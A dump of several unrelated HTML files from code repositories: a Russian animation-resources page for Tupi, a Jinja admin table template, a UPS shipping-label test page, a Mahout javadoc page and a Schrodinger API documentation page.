В этом разделе вы сможете найти интересные ресурсы, которые помогут обогатить ваш процесс обучения, как аниматора, иллюстратора и художника. Надеемся это будет для Вас полезным:
<ul>
<li>Официальный сайт Tupi:<br/>
<a href="http://www.maefloresta.com">http://www.maefloresta.com</a></li>
<li>Галерея видео:<br/>
<a href="http://www.maefloresta.com/videos">http://www.maefloresta.com/videos</a></li>
<li>Tupi в Twitter:<br/>
<a href="http://twitter.com/maefloresta">http://twitter.com/maefloresta</a></li>
</ul>
<ul>
Другие проекты свободного программного обеспечения в области графики и анимации в GNU/Linux:
<li>Gimp: Программное обеспечение для редактирования и манипуляций с изображениями<br/>
<a href="http://www.gimp.org/">http://www.gimp.org/</a></li>
<li>Inkscape: Векторный графический редактор<br/>
<a href="http://www.inkscape.org/?lang=ru">http://www.inkscape.org/?lang=ru</a></li>
<li>Synfig: Инструмент анимации 2D<br/>
<a href="http://synfig.org/">http://synfig.org/</a></li>
<li>Blender: Окружение для 3D анимации<br/>
<a href="http://www.blender.org/">http://www.blender.org/</a></li>
</ul>
<ul>
Сайты, содержащие информацию об анимации и другие ресурсы:
<li>Определение в Википедии:<br/>
<a href="http://es.wikipedia.org/wiki/Animaci%C3%B3n">http://es.wikipedia.org/wiki/Animación</a></li>
<li>Репозиторий бесплатных клипартов:<br/>
<a href="http://www.openclipart.org/">http://www.openclipart.org/</a></li>
<li>Поисковая система Creative Commons:<br/>
<a href="http://search.creativecommons.org/">http://search.creativecommons.org/</a></li>
</ul>
</p>
<p class="paragraph">
<b>Внимание:</b> Если Вы знаете ссылки, связанные с мировой анимацией, и хотите включить их в этот раздел, пожалуйста, <a href="http://www.maefloresta.com">свяжитесь с нами</a>.
</p>
</body>
</html>
|
app/templates/adm/funcionalidade/pesquisar.html | goldblade/CobemApp | {% for f in dados %}
<tr>
<td>
{{f.nome}}
</td>
<td class="text-right">
{{f.modulo}}
</td>
<td style="width: 15%;">
<a href="{{ url_for('.funcionalidade_exibir_view', id=f.id) }}" class="table-link">
<span class="fa-stack">
<i class="fa fa-square fa-stack-2x"></i>
<i class="fa fa-search-plus fa-stack-1x fa-inverse"></i>
</span>
</a>
<a href="{{ url_for('.funcionalidade_editar_view', id=f.id) }}" class="table-link">
<span class="fa-stack">
<i class="fa fa-square fa-stack-2x"></i>
<i class="fa fa-pencil fa-stack-1x fa-inverse"></i>
</span>
</a>
<a href="{{ url_for('.funcionalidade_deletar_view', id=f.id) }}" class=" table-link danger delete">
<span class="fa-stack">
<i class="fa fa-square fa-stack-2x"></i>
<i class="fa fa-trash-o fa-stack-1x fa-inverse"></i>
</span>
</a>
</td>
</tr>
{% else %}
<tr>
<td colspan="3">
<div class="alert alert-info">
<i class="fa fa-info-circle fa-fw fa-lg"></i>
<strong>Nenhuma funcionalidade cadastrada!</strong>
</div>
</td>
</tr>
{% endfor %} |
lib/ups/TestCases/HTML_4_1.html | ppramesi/bbcharcoal | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 3.2//EN">
<html><head><title>
View/Print Label</title></head><style>
.small_text {font-size: 80%;}
.large_text {font-size: 115%;}
</style>
<body bgcolor="#FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" width="600"><tr>
<td height="410" align="left" valign="top">
<B class="large_text">View/Print Label</B>
<br>
<br>
<ol class="small_text"> <li><b>Print the label:</b>
Select Print from the File menu in this browser window to print the label below.<br><br><li><b>
Fold the printed label at the dotted line.</b>
Place the label in a UPS Shipping Pouch. If you do not have a pouch, affix the folded label using clear plastic shipping tape over the entire label.<br><br><li><b>GETTING YOUR SHIPMENT TO UPS<br>
Customers without a Daily Pickup</b><ul><li>Take this package to any location of The UPS Store®, UPS Drop Box, UPS Customer Center, UPS Alliances (Office Depot® or Staples®) or Authorized Shipping Outlet near you or visit <a href="http://www.ups.com/content/us/en/index.jsx">www.ups.com/content/us/en/index.jsx</a> and select Drop Off.<li>
Air shipments (including Worldwide Express and Expedited) can be picked up or dropped off. To schedule a pickup, or to find a drop-off location, select the Pickup or Drop-off icon from the UPS tool bar. </ul> <br>
<b>Customers with a Daily Pickup</b><ul><li>
Your driver will pickup your shipment(s) as usual. </ul>
</ol></td></tr></table><table border="0" cellpadding="0" cellspacing="0" width="600">
<tr>
<td class="small_text" align="left" valign="top">
<a name="foldHere">FOLD HERE</a></td>
</tr>
<tr>
<td align="left" valign="top"><hr>
</td>
</tr>
</table>
<table>
<tr>
<td height="10">
</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="650" ><tr>
<td align="left" valign="top">
<IMG SRC="./label1Z0Y032A0199553241.gif" height="392" width="651">
</td>
</tr></table>
</body>
</html>
|
sites/all/libraries/mahout/docs/mahout-core/org/apache/mahout/cf/taste/eval/RecommenderIRStatsEvaluator.html | front/commerce | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_24) on Sat May 28 14:07:15 BST 2011 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
RecommenderIRStatsEvaluator (Mahout Core 0.5 API)
</TITLE>
<META NAME="date" CONTENT="2011-05-28">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="RecommenderIRStatsEvaluator (Mahout Core 0.5 API)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/RecommenderIRStatsEvaluator.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/RecommenderEvaluator.html" title="interface in org.apache.mahout.cf.taste.eval"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?org/apache/mahout/cf/taste/eval/RecommenderIRStatsEvaluator.html" target="_top"><B>FRAMES</B></A>
<A HREF="RecommenderIRStatsEvaluator.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
org.apache.mahout.cf.taste.eval</FONT>
<BR>
Interface RecommenderIRStatsEvaluator</H2>
<DL>
<DT><B>All Known Implementing Classes:</B> <DD><A HREF="../../../../../../org/apache/mahout/cf/taste/impl/eval/GenericRecommenderIRStatsEvaluator.html" title="class in org.apache.mahout.cf.taste.impl.eval">GenericRecommenderIRStatsEvaluator</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public interface <B>RecommenderIRStatsEvaluator</B></DL>
</PRE>
<P>
<p>
Implementations collect information retrieval-related statistics on a
<A HREF="../../../../../../org/apache/mahout/cf/taste/recommender/Recommender.html" title="interface in org.apache.mahout.cf.taste.recommender"><CODE>Recommender</CODE></A>'s performance, including precision, recall and
f-measure.
</p>
<p>
See <a href="http://en.wikipedia.org/wiki/Information_retrieval">Information retrieval</a>.
<P>
<P>
<HR>
<P>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../../../org/apache/mahout/cf/taste/eval/IRStatistics.html" title="interface in org.apache.mahout.cf.taste.eval">IRStatistics</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../../org/apache/mahout/cf/taste/eval/RecommenderIRStatsEvaluator.html#evaluate(org.apache.mahout.cf.taste.eval.RecommenderBuilder, org.apache.mahout.cf.taste.eval.DataModelBuilder, org.apache.mahout.cf.taste.model.DataModel, org.apache.mahout.cf.taste.recommender.IDRescorer, int, double, double)">evaluate</A></B>(<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/RecommenderBuilder.html" title="interface in org.apache.mahout.cf.taste.eval">RecommenderBuilder</A> recommenderBuilder,
<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/DataModelBuilder.html" title="interface in org.apache.mahout.cf.taste.eval">DataModelBuilder</A> dataModelBuilder,
<A HREF="../../../../../../org/apache/mahout/cf/taste/model/DataModel.html" title="interface in org.apache.mahout.cf.taste.model">DataModel</A> dataModel,
<A HREF="../../../../../../org/apache/mahout/cf/taste/recommender/IDRescorer.html" title="interface in org.apache.mahout.cf.taste.recommender">IDRescorer</A> rescorer,
int at,
double relevanceThreshold,
double evaluationPercentage)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<P>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="evaluate(org.apache.mahout.cf.taste.eval.RecommenderBuilder, org.apache.mahout.cf.taste.eval.DataModelBuilder, org.apache.mahout.cf.taste.model.DataModel, org.apache.mahout.cf.taste.recommender.IDRescorer, int, double, double)"><!-- --></A><H3>
evaluate</H3>
<PRE>
<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/IRStatistics.html" title="interface in org.apache.mahout.cf.taste.eval">IRStatistics</A> <B>evaluate</B>(<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/RecommenderBuilder.html" title="interface in org.apache.mahout.cf.taste.eval">RecommenderBuilder</A> recommenderBuilder,
<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/DataModelBuilder.html" title="interface in org.apache.mahout.cf.taste.eval">DataModelBuilder</A> dataModelBuilder,
<A HREF="../../../../../../org/apache/mahout/cf/taste/model/DataModel.html" title="interface in org.apache.mahout.cf.taste.model">DataModel</A> dataModel,
<A HREF="../../../../../../org/apache/mahout/cf/taste/recommender/IDRescorer.html" title="interface in org.apache.mahout.cf.taste.recommender">IDRescorer</A> rescorer,
int at,
double relevanceThreshold,
double evaluationPercentage)
throws <A HREF="../../../../../../org/apache/mahout/cf/taste/common/TasteException.html" title="class in org.apache.mahout.cf.taste.common">TasteException</A></PRE>
<DL>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>recommenderBuilder</CODE> - object that can build a <A HREF="../../../../../../org/apache/mahout/cf/taste/recommender/Recommender.html" title="interface in org.apache.mahout.cf.taste.recommender"><CODE>Recommender</CODE></A> to test<DD><CODE>dataModelBuilder</CODE> - <A HREF="../../../../../../org/apache/mahout/cf/taste/eval/DataModelBuilder.html" title="interface in org.apache.mahout.cf.taste.eval"><CODE>DataModelBuilder</CODE></A> to use, or if null, a default <A HREF="../../../../../../org/apache/mahout/cf/taste/model/DataModel.html" title="interface in org.apache.mahout.cf.taste.model"><CODE>DataModel</CODE></A> implementation will be
used<DD><CODE>dataModel</CODE> - dataset to test on<DD><CODE>rescorer</CODE> - if any, to use when computing recommendations<DD><CODE>at</CODE> - as in, "precision at 5". The number of recommendations to consider when evaluating precision,
etc.<DD><CODE>relevanceThreshold</CODE> - items whose preference value is at least this value are considered "relevant" for the purposes
of computations
<DT><B>Returns:</B><DD><A HREF="../../../../../../org/apache/mahout/cf/taste/eval/IRStatistics.html" title="interface in org.apache.mahout.cf.taste.eval"><CODE>IRStatistics</CODE></A> with resulting precision, recall, etc.
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../../../org/apache/mahout/cf/taste/common/TasteException.html" title="class in org.apache.mahout.cf.taste.common">TasteException</A></CODE> - if an error occurs while accessing the <A HREF="../../../../../../org/apache/mahout/cf/taste/model/DataModel.html" title="interface in org.apache.mahout.cf.taste.model"><CODE>DataModel</CODE></A></DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/RecommenderIRStatsEvaluator.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../org/apache/mahout/cf/taste/eval/RecommenderEvaluator.html" title="interface in org.apache.mahout.cf.taste.eval"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?org/apache/mahout/cf/taste/eval/RecommenderIRStatsEvaluator.html" target="_top"><B>FRAMES</B></A>
<A HREF="RecommenderIRStatsEvaluator.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
Copyright © 2008-2011 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All Rights Reserved.
</BODY>
</HTML>
|
Schrodinger/Schrodinger_2015-2_docs/python_api/api/schrodinger.application.matsci.rxn_path.InternalCoords-class.html | platinhom/ManualHom | <?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>schrodinger.application.matsci.rxn_path.InternalCoords</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>2015-2Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
<tr valign="top">
<td width="100%">
<span class="breadcrumbs">
<a href="schrodinger-module.html">Package schrodinger</a> ::
<a href="schrodinger.application-module.html">Package application</a> ::
<a href="schrodinger.application.matsci-module.html">Package matsci</a> ::
<a href="schrodinger.application.matsci.rxn_path-module.html">Module rxn_path</a> ::
Class InternalCoords
</span>
</td>
<td>
<table cellpadding="0" cellspacing="0">
<!-- hide/show private -->
<tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
onclick="toggle_private();">hide private</a>]</span></td></tr>
<tr><td align="right"><span class="options"
>[<a href="frames.html" target="_top">frames</a
>] | <a href="schrodinger.application.matsci.rxn_path.InternalCoords-class.html"
target="_top">no frames</a>]</span></td></tr>
</table>
</td>
</tr>
</table>
<!-- ==================== CLASS DESCRIPTION ==================== -->
<h1 class="epydoc">Class InternalCoords</h1><p class="nomargin-top"></p>
<pre class="base-tree">
<a href="object-class.html">object</a> --+
|
<strong class="uidshort">InternalCoords</strong>
</pre>
<hr />
<p>Manage the internal coordinates of a structure.</p>
<!-- ==================== INSTANCE METHODS ==================== -->
<a name="section-InstanceMethods"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Instance Methods</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-InstanceMethods"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a href="schrodinger.application.matsci.rxn_path.InternalCoords-class.html#__init__" class="summary-sig-name">__init__</a>(<span class="summary-sig-arg">self</span>)</span><br />
Create an InternalCoords instance.</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a href="schrodinger.application.matsci.rxn_path.InternalCoords-class.html#getZmatrix" class="summary-sig-name">getZmatrix</a>(<span class="summary-sig-arg">self</span>,
<span class="summary-sig-arg">astructure</span>)</span><br />
Get the Z-matrix for the structure.</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a href="schrodinger.application.matsci.rxn_path.InternalCoords-class.html#getDmatrix" class="summary-sig-name">getDmatrix</a>(<span class="summary-sig-arg">self</span>,
<span class="summary-sig-arg">astructure</span>)</span><br />
Get the distance matrix for the structure.</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a href="schrodinger.application.matsci.rxn_path.InternalCoords-class.html#printInternals" class="summary-sig-name">printInternals</a>(<span class="summary-sig-arg">self</span>,
<span class="summary-sig-arg">headermsg</span>,
<span class="summary-sig-arg">maxindexwidth</span>,
<span class="summary-sig-arg">logger</span>)</span><br />
Formatted print of header followed by the internal coordinates.</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code><a href="object-class.html">object</a></code></b>:
<code><a href="object-class.html#__delattr__">__delattr__</a></code>,
<code><a href="object-class.html#__format__">__format__</a></code>,
<code><a href="object-class.html#__getattribute__">__getattribute__</a></code>,
<code><a href="object-class.html#__hash__">__hash__</a></code>,
<code><a href="object-class.html#__new__">__new__</a></code>,
<code><a href="object-class.html#__reduce__">__reduce__</a></code>,
<code><a href="object-class.html#__reduce_ex__">__reduce_ex__</a></code>,
<code><a href="object-class.html#__repr__">__repr__</a></code>,
<code><a href="object-class.html#__setattr__">__setattr__</a></code>,
<code><a href="object-class.html#__sizeof__">__sizeof__</a></code>,
<code><a href="object-class.html#__str__">__str__</a></code>,
<code><a href="object-class.html#__subclasshook__">__subclasshook__</a></code>
</p>
</td>
</tr>
</table>
<!-- ==================== CLASS VARIABLES ==================== -->
<a name="section-ClassVariables"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Class Variables</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-ClassVariables"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<a name="ZMATNUMBER"></a><span class="summary-name">ZMATNUMBER</span> = <code title="1">1</code>
</td>
</tr>
</table>
<!-- ==================== PROPERTIES ==================== -->
<a name="section-Properties"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Properties</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-Properties"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code><a href="object-class.html">object</a></code></b>:
<code><a href="object-class.html#__class__">__class__</a></code>
</p>
</td>
</tr>
</table>
<!-- ==================== METHOD DETAILS ==================== -->
<a name="section-MethodDetails"></a>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Method Details</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-MethodDetails"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
</table>
<a name="__init__"></a>
<div>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr><td>
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr valign="top"><td>
<h3 class="epydoc"><span class="sig"><span class="sig-name">__init__</span>(<span class="sig-arg">self</span>)</span>
<br /><em class="fname">(Constructor)</em>
</h3>
</td><td align="right" valign="top"
>
</td>
</tr></table>
<p>Create an InternalCoords instance.</p>
<dl class="fields">
<dt>Overrides:
object.__init__
</dt>
</dl>
</td></tr></table>
</div>
<a name="getZmatrix"></a>
<div>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr><td>
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr valign="top"><td>
<h3 class="epydoc"><span class="sig"><span class="sig-name">getZmatrix</span>(<span class="sig-arg">self</span>,
<span class="sig-arg">astructure</span>)</span>
</h3>
</td><td align="right" valign="top"
>
</td>
</tr></table>
<p>Get the Z-matrix for the structure.</p>
<dl class="fields">
<dt>Parameters:</dt>
<dd><ul class="nomargin-top">
<li><strong class="pname"><code>astructure</code></strong> (schrodinger.structure.Structure) - the structure</li>
</ul></dd>
</dl>
</td></tr></table>
</div>
<a name="getDmatrix"></a>
<div>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr><td>
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr valign="top"><td>
<h3 class="epydoc"><span class="sig"><span class="sig-name">getDmatrix</span>(<span class="sig-arg">self</span>,
<span class="sig-arg">astructure</span>)</span>
</h3>
</td><td align="right" valign="top"
>
</td>
</tr></table>
<p>Get the distance matrix for the structure.</p>
<dl class="fields">
<dt>Parameters:</dt>
<dd><ul class="nomargin-top">
<li><strong class="pname"><code>astructure</code></strong> (schrodinger.structure.Structure) - the structure</li>
</ul></dd>
</dl>
</td></tr></table>
</div>
<a name="printInternals"></a>
<div>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr><td>
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr valign="top"><td>
<h3 class="epydoc"><span class="sig"><span class="sig-name">printInternals</span>(<span class="sig-arg">self</span>,
<span class="sig-arg">headermsg</span>,
<span class="sig-arg">maxindexwidth</span>,
<span class="sig-arg">logger</span>)</span>
</h3>
</td><td align="right" valign="top"
>
</td>
</tr></table>
<p>Formatted print of header followed by the internal coordinates.</p>
<dl class="fields">
<dt>Parameters:</dt>
<dd><ul class="nomargin-top">
<li><strong class="pname"><code>headermsg</code></strong> (str) - header</li>
<li><strong class="pname"><code>maxindexwidth</code></strong> (int) - number of characters in the largest atom index</li>
<li><strong class="pname"><code>logger</code></strong> (logging.getLogger) - output logger</li>
</ul></dd>
</dl>
</td></tr></table>
</div>
<br />
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>2015-2Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
